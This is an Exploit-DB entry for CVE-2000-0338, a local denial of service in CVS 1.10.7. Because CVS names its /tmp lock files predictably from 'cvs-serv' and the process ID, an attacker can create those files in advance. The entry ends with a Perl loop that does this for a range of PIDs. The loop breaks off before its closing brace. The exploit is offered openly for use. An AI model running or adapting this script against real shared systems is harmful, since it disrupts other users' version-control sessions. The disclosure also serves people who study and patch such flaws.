CVS 1.10.7 - Local Denial of Service Vulnerability

ID EDB-ID:19870
Type exploitdb
Reporter Michal Szymanski
Modified 2000-04-23T00:00:00


CVS 1.10.7 Local Denial of Service Vulnerability. CVE-2000-0338. Dos exploit for linux platform


CVS stands for Concurrent Versions Software and is an open-source package designed to allow multiple developers to work concurrently on a single source tree, recording changes and controlling versions. It is possible to cause a denial of service for users of CVS due to predictable temporary filenames. CVS uses locking directories in /tmp and combines the static string 'cvs-serv' with the process ID to use as filenames. This is trivial to guess for an attacker, and since /tmp is world writeable, directories can be created with predicted names. CVS drops root priviliges, so these directories cannot be overwritten and every session for which a locking directory has been already created (by the attacker) will be broken.

The following perl script will create many directories in /tmp with incrementing pids:



for ($x=$min;$x<=$max;$x++) {
open CVSTMP, ">>/tmp/cvs-serv$x" or die "/tmp/cvs-serv$x: $!";
chmod 0600, "/tmp/cvs-serv$x";
close CVSTMP;